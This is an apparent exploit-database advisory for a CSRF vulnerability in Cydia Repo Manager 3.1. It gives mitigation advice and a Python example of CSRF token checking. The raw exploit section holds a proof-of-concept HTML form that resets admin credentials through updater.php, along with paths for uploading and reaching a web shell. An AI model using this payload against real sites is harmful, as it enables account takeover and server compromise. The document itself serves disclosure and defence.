Vendor: Cydia Repo Manager
By: cr4wl3r
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: Cydia Repo Manager
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:damar1st:cydia_repo_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2013

Cydia Repo Manager CSRF Vulnerability

Cydia Repo Manager is vulnerable to Cross-Site Request Forgery (CSRF). Because state-changing requests are accepted without any anti-CSRF token, an attacker can craft an HTML form that targets the application and have a logged-in victim's browser submit it, so the request is sent with the victim's authenticated session. Such a form can be used to perform administrative actions such as creating a new user, changing the password of an existing user, or uploading a malicious file. The form can be hosted on any website the victim visits, or delivered by email or instant messaging.

Mitigation:

The application should implement a CSRF token: an unguessable, per-session value embedded in every form and verified on every state-changing request, so that a request forged from another origin (which cannot read the token) is rejected. The application should also implement a Content Security Policy as defense in depth; note that a CSP restricts script execution but does not by itself block a plain HTML form post from another site, so the token check is the essential control.
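The token check described above, modelled on the advisory's updater.php form fields, as an added example (not code from Cydia Repo Manager); the `csrf_token` field name, the session dictionary and `handle_updater_post` are assumptions for illustration:

```python
import hmac
import secrets

# Field names from the advisory's proof-of-concept form (sample values constructed).
POC_FORM = {"user": "Username", "pass": "Password", "s": "w00tw00t!"}

TOKEN_FIELD = "csrf_token"  # hypothetical hidden form field name


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) a per-session synchronizer token to embed in forms."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def verify_csrf(session: dict, form: dict) -> bool:
    """Accept a state-changing POST only if it carries the session's token."""
    expected = session.get(TOKEN_FIELD)
    submitted = form.get(TOKEN_FIELD)
    if not expected or not isinstance(submitted, str):
        return False
    # Constant-time comparison: a forged request must not leak token bytes via timing.
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_updater_post(session: dict, form: dict) -> str:
    """Model of what updater.php should do before touching credentials."""
    if not verify_csrf(session, form):
        return "403 rejected: missing or invalid CSRF token"
    return f"200 updated credentials for {form['user']}"


def demo() -> tuple:
    """Forged PoC form (no token) is rejected; the same-origin form with token passes."""
    session = {}
    token = issue_csrf_token(session)
    forged = dict(POC_FORM)  # an attacker's page cannot read the victim's token
    legit = dict(POC_FORM, **{TOKEN_FIELD: token})
    return handle_updater_post(session, forged), handle_updater_post(session, legit)


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```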

Exploit-DB raw data:

# Cydia Repo Manager CSRF Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
# Software Link: http://damarist.de/?lang=en
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
# Tested: Win 7

Proof of concept:

<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>


Login :  http://bastardlabs/[CydiaRepoManager_path]/index.php

Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php

Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php


Demo : 
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png